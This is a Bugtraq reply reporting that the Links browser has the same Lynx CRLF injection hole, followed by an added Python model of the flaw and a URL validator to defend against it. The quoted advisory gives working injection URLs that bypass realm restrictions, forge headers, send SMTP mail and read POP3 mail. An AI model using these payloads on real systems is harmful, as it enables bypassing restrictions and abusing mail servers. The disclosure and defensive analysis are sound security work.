Re: Lynx CRLF Injection, part two

From: Alberto Devesa (alberto.devesa@m-centric.com)
Date: 08/23/02


From: Alberto Devesa <alberto.devesa@m-centric.com>
To: Ulf Harnhammar <ulfh@update.uu.se>, bugtraq@securityfocus.com
Date: Fri, 23 Aug 2002 11:09:21 +0200

The same bug seems to affect the links browser. I have tested it with
version 0.96. Links is another console browser with extended capabilities not
supported by lynx, like frames, colors and menus.

On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote:
> Lynx CRLF Injection, part two
>
>
> This is a follow-up to my "Lynx CRLF Injection" post a few days
> ago.
>
>
> * Lynx has got a realm feature that restricts users from accessing
> any host apart from the host of its start page. That is, if you
> start Lynx with "lynx -realm http://www.site1.st/", you are not
> allowed to go to http://www.site2.st/ .
>
> The CRLF Injection security hole allows users to break out of
> realms - the command:
>
> $ lynx -realm "http://www.site1.st/ HTTP/1.0
> Host: www.site2.st
>
> "
>
> will show site2.st, despite the fact that it is outside of the realm.
>
>
> * It allows users to send arbitrary cookies, user agents and
> referers to a web server - even if you're using a restrictions option
> saying that you're not allowed to change user agent:
>
> $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
> User-Agent: Ulf 0.0
> Referer: http://www.metaur.nu/
> Cookie: user=ulf
>
> "
>
>
> * It is also possible to use this hole for communication with other
> types of servers than HTTP servers. You can send e-mails with it, for
> example - even if you're using a restrictions option saying that
> you're not allowed to send e-mails:
>
> $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
> HELO my.own.site
> MAIL FROM: <my.own@mail.address>
> RCPT TO: <info@site1.st>
> DATA
> From: my.own@mail.address
> To: info@site1.st
> Subject: This is..
>
> This is a URL that sends an e-mail (?).
> .
> QUIT
>
> "
>
> You have to use port 587, as Lynx blocks port 25.
>
> The MTA will complain about the "GET / HTTP/1.0" string, but it
> still works.
>
>
> * You can even use this hole for reading e-mails from a POP3 server:
>
> $ lynx "http://mail.site1.st:110/ HTTP/1.0
> USER ulf
> PASS xxxx
> LIST
> RETR 1
> QUIT
>
> "
>
> The POP3 server will also complain about the "GET / HTTP/1.0"
> string, but it still works with this technology as well.
>
>
> * As previously noted, the holes listed above mostly affect programs
> that start Lynx, interactively or not, with a URL wholly or partially
> under the user's control.
>
>
> * The patch for this hole has moved to:
> ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
>
>
> // Ulf Harnhammar
> ulfh@update.uu.se
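The mechanism behind all of Ulf's examples is the same: the browser copies the "URL" it was given into its request line byte for byte, so a CR or LF inside it ends the request line early and everything after it is read by the server as further headers or, on SMTP/POP3, as further commands. The following is an added example, not code from the original thread or from Lynx or Links. It models that behaviour with a deliberately naive client (an assumption about how such a client could be written, not Lynx's actual code), parses the resulting bytes the way an HTTP server and a line-oriented mail server would, and ends with the check a program that launches a browser with a user-supplied URL should make before building the command line. The sample URLs are constructed here, patterned on the post; www.site1.st, www.site2.st and mail.site1.st are the post's placeholder hosts.

```python
"""Added example (not from the original post, Lynx or Links): CR/LF in a URL
becomes request splitting when a client splices the path into its request
line unescaped.  The 'naive client' below is an illustrative assumption about
how such a client could be written, not Lynx's real code."""
import re

# Constructed sample inputs, patterned on the post: a realm escape and a
# mail-sending "URL" aimed at the submission port (587, since 25 is blocked).
INJECTED_URL = "http://www.site1.st/ HTTP/1.0\nHost: www.site2.st\n\n"
SMTP_URL = ("http://mail.site1.st:587/ HTTP/1.0\n"
            "HELO my.own.site\n"
            "MAIL FROM: <my.own@mail.address>\n"
            "RCPT TO: <info@site1.st>\n"
            "DATA\nSubject: This is..\n\nThis is a URL that sends an e-mail.\n.\n"
            "QUIT\n\n")

# Controls, space and DEL never appear unescaped in a valid URL (RFC 3986).
_FORBIDDEN = re.compile(r"[\x00-\x20\x7f]")


def split_url(url):
    """Minimal scheme://host[:port]/path splitter that copies bytes verbatim.
    urllib.parse.urlsplit is avoided on purpose: current Pythons silently drop
    CR, LF and TAB from URLs, which would hide exactly what is being shown."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("no scheme")
    hostport, slash, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    default_port = 443 if scheme == "https" else 80
    return scheme, host, int(port) if port else default_port, (slash + path) or "/"


def naive_request(url):
    """Model of a client that splices the path into the request line without
    escaping it: the behaviour the post exploits (assumed shape, not Lynx's)."""
    _, host, _, path = split_url(url)
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("latin-1")


def server_view(raw):
    """What an HTTP server makes of the bytes: one request line, then headers
    up to the first blank line.  With an injected URL the attacker's Host
    header is the first one, so it wins; the client's own Host header lands
    in 'leftover', after the blank line, and is never part of this request."""
    lines = raw.decode("latin-1").split("\n")
    method, target, version = lines[0].rstrip("\r").split(" ", 2)
    headers, i = {}, 1
    while i < len(lines) and lines[i].rstrip("\r") != "":
        name, _, value = lines[i].rstrip("\r").partition(":")
        headers[name.strip()] = value.strip()
        i += 1
    return {"method": method, "target": target, "version": version,
            "headers": headers, "leftover": "\n".join(lines[i + 1:])}


def line_protocol_view(raw):
    """What a line-oriented server such as SMTP or POP3 sees: one command per
    line, obeyed in order until QUIT.  'GET / HTTP/1.0' is rejected as an
    unknown command, the injected lines are executed, and the client's
    trailing HTTP headers arrive after QUIT so they are never read."""
    seen = []
    for line in raw.decode("latin-1").replace("\r\n", "\n").split("\n"):
        seen.append(line)
        if line == "QUIT":
            break
    return seen


def check_url(url, realm_host, allowed_ports=(80, 443)):
    """The check a wrapper should make BEFORE handing a user-supplied URL to a
    browser: no control character or whitespace anywhere in the string, an
    http(s) scheme, the host inside the realm, and a port allow-list (a port
    deny-list is why blocking 25 did not stop mail via 587).  The realm test
    runs on the exact string that will be sent, after the byte check, so it
    cannot be fooled by a second Host line.  Raises ValueError on rejection."""
    if _FORBIDDEN.search(url):
        raise ValueError("control character or whitespace in URL")
    scheme, host, port, _ = split_url(url)
    if scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if host.lower() != realm_host.lower():
        raise ValueError("host outside realm")
    if port not in allowed_ports:
        raise ValueError("port not allowed")
    return url


def is_safe_url(url, realm_host, allowed_ports=(80, 443)):
    """Boolean convenience wrapper around check_url."""
    try:
        check_url(url, realm_host, allowed_ports)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(server_view(naive_request(INJECTED_URL)))
    print(line_protocol_view(naive_request(SMTP_URL)))
    print(is_safe_url(INJECTED_URL, "www.site1.st"), is_safe_url(SMTP_URL, "mail.site1.st"))
```

Run it and the HTTP view of INJECTED_URL reports Host www.site2.st with the client's own "Host: www.site1.st" stranded in the leftover, the SMTP view starts with the rejected GET line and ends at the injected QUIT, and both sample URLs fail check_url on the very first test, before any realm or port logic is consulted. That ordering is the point: a realm or user-agent restriction applied to a string that can still contain a newline is a restriction on the wrong data.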